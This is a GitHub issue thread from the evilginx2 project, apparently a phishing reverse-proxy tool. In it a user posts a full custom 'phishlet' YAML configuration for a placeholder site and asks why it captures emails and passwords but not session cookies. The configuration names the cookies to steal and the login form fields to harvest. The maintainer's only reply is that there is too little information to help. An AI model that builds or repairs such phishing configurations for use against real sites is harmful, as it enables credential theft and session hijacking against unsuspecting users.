### ISSUE TITLE
not capture cookie 

### ISSUE THREAD

**Issue by kimseler14** [kgretzky/evilginx2#150]
hello, i write a new phishlets.and it work ı can get pass and mail but cookie not . who can help me?

author: '@kimse'
min_ver: '2.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'site.com', session: true, is_landing: true}
  - {phish_sub: 'ws', orig_sub: 'ws', domain: 'site.com', session: false, is_landing: false}
  - {phish_sub: 'back', orig_sub: 'back', domain: 'site.com', session: false, is_landing: false}
``
sub_filters:
  - {triggers_on: 'site.com', orig_sub: '', domain: 'site.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'ws.site.com', orig_sub: 'abs', domain: 'site.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'back.site.com', orig_sub: 'api', domain: 'site.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.site.com'
    keys: ['__cfduid', 'DnTY', 'alert-batm', 'i18next', 'site_session','XSRF-TOKEN']
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
landing_path:
  - '/login'

**Comment by kgretzky** [comment]
There is not enough info or even a valid link to the website to help here.
